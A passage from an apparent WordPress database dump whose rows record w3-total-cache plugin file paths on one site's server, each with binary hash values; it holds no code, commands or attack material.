','wp-content/plugins/w3-total-cache/CdnEngine_Ftp.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bi28J4U','\0X HR9&89=yr\n','',0,'?'),('ixq+','wp-content/plugins/w3-total-cache/CdnEngine_GoogleDrive.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_GoogleDrive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W3r]ě\0n','4k@Μ) Tp7/٘Z,m','',0,'?'),('f;HB,4+\Z','wp-content/plugins/w3-total-cache/CdnEngine_Mirror.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Mirror.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' L3QWL\"֒,',')`Xk~!\"d?I$daaHe\nV','',0,'?'),('j#cuBn@܏d','wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Akamai.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Akamai.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pX~8`k','3a&D*v#^RޗN0G\0I^7','',0,'?'),('\'h䠱l(','wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Att.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Att.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kEE<^k','dN€Ey磉Ę\r0g','',0,'?'),('IfAŷ','wp-content/plugins/w3-total-cache/CdnEngine_Mirror_CloudFront.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Mirror_CloudFront.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D:\\l1 \n','',0,'?'),(',ŦP!xDQj','wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Cotendo.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Mirror_Cotendo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H/I!J%짏','9u(㚫HVdb\r:f~t','',0,'?'),('\0םk0DFh','wp-content/plugins/w3-total-cache/CdnEngine_RackSpaceCloudFiles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_RackSpaceCloudFiles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"M3v/vBk7Ac','7>3EW#Hyj','wp-content/plugins/w3-total-cache/Cdn_Environment.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' FwpՠW','ʩ.##FZ]۔Ui{6Js','',0,'?'),('Ve=\"g','wp-content/plugins/w3-total-cache/Cdn_Environment_LiteSpeed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Environment_LiteSpeed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fl,]7;v','3`3q~&k)^;@udn','',0,'?'),('>%GfHH]l<','wp-content/plugins/w3-total-cache/Cdn_Environment_Nginx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Environment_Nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','> k D',',l]\r*.%XZE ','',0,'?'),('Bj79pAof','wp-content/plugins/w3-total-cache/Cdn_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v 0u\\?\0','q0GBS+F_\Z$6A`','',0,'?'),('h\ZDP:1','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SBT,#ٴ','IvO\054[߃Fo\"ם\n*\\','',0,'?'),('͌)i\n$jd','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yl hvL','\n>2Kr1܏2*#a&ɒ}','',0,'?'),(':X@','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`]&~+\\; gӇ','gsQ\'%n`hd\n}:','',0,'?'),('0_ __,}F','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb/)\nV`˳ ','r\'j{Fi2\n&5_{iRu','',0,'?'),('\"ARP2','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Popup_AuthReturn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Popup_AuthReturn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cMjw?v lO7','+d56kG3WQCM#~B&W\"s9\'B','',0,'?'),('.GZ+\"','wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Popup_AuthReturn_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_GoogleDrive_Popup_AuthReturn_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u+=ƇYdPr','Z,cvͽ6rŚ~\'OC\rn','',0,'?'),('Ӓ i:uRϖ','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 W. 2','NB.BH#k\'','',0,'?'),('UIp Nf<','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha!!2n8c','$:-;v_5?X%%/\'','',0,'?'),('w,r','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_ConfigureCnamesForm.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_ConfigureCnamesForm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MǿȾ}X','={bޝ','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pKJb~',' &H4/j ȤŶώ8P','',0,'?'),('`V:q+%J|#','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_SelectHost.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Popup_View_SelectHost.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' N Pѡ1','N0= f|xz&TĐE','',0,'?'),('ƓB`@:','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ޤ9F','߬\n:\":N \n46iI','',0,'?'),('tEYb@6','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9oz*;DB','̋AVVΤ;)T\'B9My;','',0,'?'),('%ƟZj@|g','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r|1CigK','6ALHvw.J%_/lJ','',0,'?'),('#aFwx(','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{@?4\ZωL]',':Y%{`VB<.S_V','',0,'?'),('H\r*X~MWr[','wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View_NotConfigured.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Highwinds_Widget_View_NotConfigured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s>GJ','єK!I){_ B~S8,\ZrS','',0,'?'),('`(Zm&tZ','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}90>OY}}f@',' .ӮDRH^ZR','',0,'?'),('B\rhXMꦂB','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','] ^q̻Nh1','o^1޲^浃H5I','',0,'?'),(';#wlGWt','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+<:nﹽ','0_[+-3EYNNG\nq/04{','',0,'?'),('*wX7ŲTŴ','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{f씈76q\r]','\Zu٨lɭ$;sLFڨhMR:qS','',0,'?'),(':+p[m%J','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v|&Wk5w','[uɔ9Mgz4χLb؄B','',0,'?'),('#}OO7h','wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_LimeLight_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m_6984D8g','k[\r.\0ַg\rG)|^)aB2','',0,'?'),('EL퐧fb','wp-content/plugins/w3-total-cache/Cdn_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KG#tZ|','~ߑsG7K Y2y]+GVT','',0,'?'),('oCyZ-5','wp-content/plugins/w3-total-cache/Cdn_Page_View_Fsd_HeaderActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Page_View_Fsd_HeaderActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 SQ2o屔','\ZĨb: VbE#pEl!','',0,'?'),(',ͤ0S;-17}56{ \"','',0,'?'),('fʽ%GF{','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_AdminActions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_AdminActions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o2>NU','ͬFdz9hq|aDGK','',0,'?'),('%5ơsq','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']f0 U.%x0',' 1P[ MMƉ\"!yVcdh','',0,'?'),('ȵ0\r=M_{u5','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2A?Иѷt','#-1B>Cs~j^e\r;','',0,'?'),('Y?@ApZw([','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gd_Ld=','\"/a*F\nJrt)21 s','',0,'?'),('\\8Uaaб(`^','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DH]C_dv','K;~q\Z}x?fvWxK_^','',0,'?'),('4O62M3jp','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_ConfigureDomains.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_ConfigureDomains.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(5n!#Jp\0','(H#hJ@m c$< ','',0,'?'),('zsRUo/kx','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d.3 پtдl','Y\r\\\\I|+ZD{\ZtU,?','',0,'?'),('E6Wb,E','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_Regions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCdn_Popup_View_Regions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' |P\njɏѼa','eF#hnV9\0׊c\n','',0,'?'),('\Z1VJP \\L{','',0,'?'),('>Xzb.','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LH`\r^^','3xKcX<qɓ\ZMSWP44E','',0,'?'),(' d\nFoI^6S˕','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ku!4J','h]٤gcAwc㝷Tpt','',0,'?'),('>\r#ӎߔ3Ƴ','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ry6Ӻ&=','HaKxy.\0#bh','',0,'?'),('\r$^dvL3','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/|v+ v&Iz','CiHZkUB\"','',0,'?'),('8!$-=B!','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Containers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Containers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T0PDS ','9V!ȓjvY\rs%mYM4','',0,'?'),('f4cwn ','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TX|bu','N `h7|ԤW-\\#dAS','',0,'?'),(' *o,$','wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Regions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpaceCloudFiles_Popup_View_Regions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-,!{jh}<','AAƻ#MtQG kѦ','',0,'?'),('Ym7ot2z=','wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CaCert-example.pem','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CaCert-example.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4bewo]uCUZ',']Lfː5wg #jWW:o.H','',0,'?'),('o=Lٖ','wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_Cdn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_Cdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9 LȰƒF$',']tmU\nު|pqs&{_a\0Qx','wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CloudFiles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CloudFiles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-3ͥ1WFD','V>3+%:<&5M#sL6&饏','',0,'?'),('\r^,#NQ','wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CloudFilesCdn.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_CloudFilesCdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#5y1r)7','&4eYq[ĕCJUp (s','',0,'?'),('|,q ?','wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_Tokens.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_RackSpace_Api_Tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% kʦi|}>F','X&\"^}̐;hIFV','',0,'?'),('}u',' Z$xi-X=AylGS$','',0,'?'),('ZC\r','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F цEx?','\0#zٙX.oK XN','',0,'?'),('GlS(\rOK','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Sites.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rm\r=/~!ք','Dsk˴ӥ<\0:','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1u̦','n!Rdf4?r;U6\Zo','',0,'?'),('sc/.4h]8p','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qe6 ,BfBs','j:ZWpՐxNy>[u^YK','',0,'?'),(',\Z֕ h|1','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BP;oŧVkDH','6 W[⩉q.mlzK<DzPyHG','',0,'?'),('P^Cͬ?','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GprPҮTs','VyzHԆh|7 DEgR@l','',0,'?'),(';7B+:','wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View_Authorized.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath2_Widget_View_Authorized.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q?F)龒<*Uv','IW\\ #5T+J\Z0','wp-content/plugins/w3-total-cache/Cdn_StackPath_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')>k[zRАVdB','',0,'?'),('Xq8EՈ8Ĵ','wp-content/plugins/w3-total-cache/Cdn_StackPath_Widget_View_Unauthorized.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_StackPath_Widget_View_Unauthorized.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vj${ `','d\Zp6HI nZO','',0,'?'),('3Y,X/u','wp-content/plugins/w3-total-cache/Cdn_Util.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdn_Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','):gDf *b','B&Zp;G|ܕW3wPۗ','',0,'?'),('80T\r','wp-content/plugins/w3-total-cache/Cdnfsd_CacheFlush.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CacheFlush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Zs/ϥ|Ʉ','̙%.fΒbVe-<8FhE','',0,'?'),('[ѕn9Cə','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Engine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s=jͪe@\\y','N+ĆEYaKNUVf[]','',0,'?'),(']dP\n;N','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AĪV` ','w\n%3v-3[33!','',0,'?'),('dfU \0([','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g: L^>6+','Y7\0gݴ7S#ؕ\\YgKfa$_','',0,'?'),('UkLKԉ','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','} ` AJ|','J\0~ngJzCZ|w+','',0,'?'),('E7>ƹO','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E?8X',' sYrԪCH\0biܺ2Z4Ց','',0,'?'),('ү3V_N둵','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Distribution.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Distribution.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SFӌ ZӉ','TakC$qjIʸlZ]\r','',0,'?'),('H\0cp6A9l','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Distributions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Distributions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hr+轢)','?Q}x7pF\rqDuJHk ie','',0,'?'),('Org+','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lDjPR@%','\\oEݾoNϤFGCӏ9+i;\"','',0,'?'),('Y\Zq$\Zl','wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Success.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_CloudFront_Popup_View_Success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','izd4`,','V &Z%\nWQyVL3y%','',0,'?'),('fڊ?\\{d%','wp-content/plugins/w3-total-cache/Cdnfsd_Core.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KLX{@;b','g`SQ9G$E>z UڐÕ','',0,'?'),('9q7R=e4','wp-content/plugins/w3-total-cache/Cdnfsd_GeneralPage_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_GeneralPage_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L7뫐^y','z;#߬|=>4aXc1_a','',0,'?'),('1Y!M0.Z&','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"%~&kQUC','q͆~ 0L[N-f7漣Gkum','',0,'?'),('2+Yаq','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Engine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qVP)$AP 5t','= #;Rv\Z]4Aid/ 2@1~','',0,'?'),('>oeTS7k','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qɊe䟋άQ','F v%1v$(4sYȓ]vJ','',0,'?'),('-Wi3{i$','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݯ#U#_IoP','el;Dx\0.sUh&NB\'(n','',0,'?'),('vwknqt','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Page_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3hP_Zy58S','lqhgM1?_ۖcs!\'w','',0,'?'),('aHF~2-y','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i%mETSbF','2g- b(j?E\n҂','',0,'?'),('|\\7Ոdf','wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup_View_Intro.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cdnfsd_LimeLight_Popup_View_Intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!i)xrr','nS\r! 